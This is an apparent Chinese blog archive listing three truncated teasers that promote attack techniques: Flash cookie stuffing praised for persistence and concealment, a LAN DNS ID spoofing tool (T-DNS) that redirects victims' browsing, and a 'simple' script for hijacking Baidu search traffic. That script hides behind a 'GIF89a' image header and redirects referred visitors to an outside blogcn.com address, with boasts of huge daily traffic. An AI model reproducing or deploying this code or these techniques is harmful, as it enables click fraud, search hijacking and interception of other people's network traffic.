Entries from 2005-09-01 to 1 month

Flash Cookie Stuffing

用flash 来做Flash Cookie Stuffing 他是本地共享对象并不是基于浏览器的,所以一但插入,就永久存在。而且还具有可操作性、比普通HTTPCookies有着更大存储空间、更好的隐蔽性等优点。加上现在FlashPlayer已经成为互联网用户标配之一,不存在兼容性的问题。…

一种简单的js劫持百度SEO的代码

一种简单的js劫持百度SEO的代码,一天做个几十万流量是没问题的。 这个是简单的代码,所以,隐藏性一般。还有更BT的。哈哈 代码1 <script language=”javascript” type=”text/javascript” src=”/images/js/j.js” ></script> 【j.js】 GIF89a=””; var d=document.referrer; if *1{ window.location.href=”http://26836659.blogcn.com“; } document.wri…

内网的DNS ID欺骗攻击

本文相关程序 T-DNS 支持对局域网内任意主机发起DNS ID欺骗攻击,使其所访问的任何网站均被指向一个您自定义的WEB服务器,如您自己的个人主页。 域名系统(DNS)是一种用于TCP/IP应用程序的分布式数据库,它提供主机名字和IP地址之间的转换信息。通常,网络…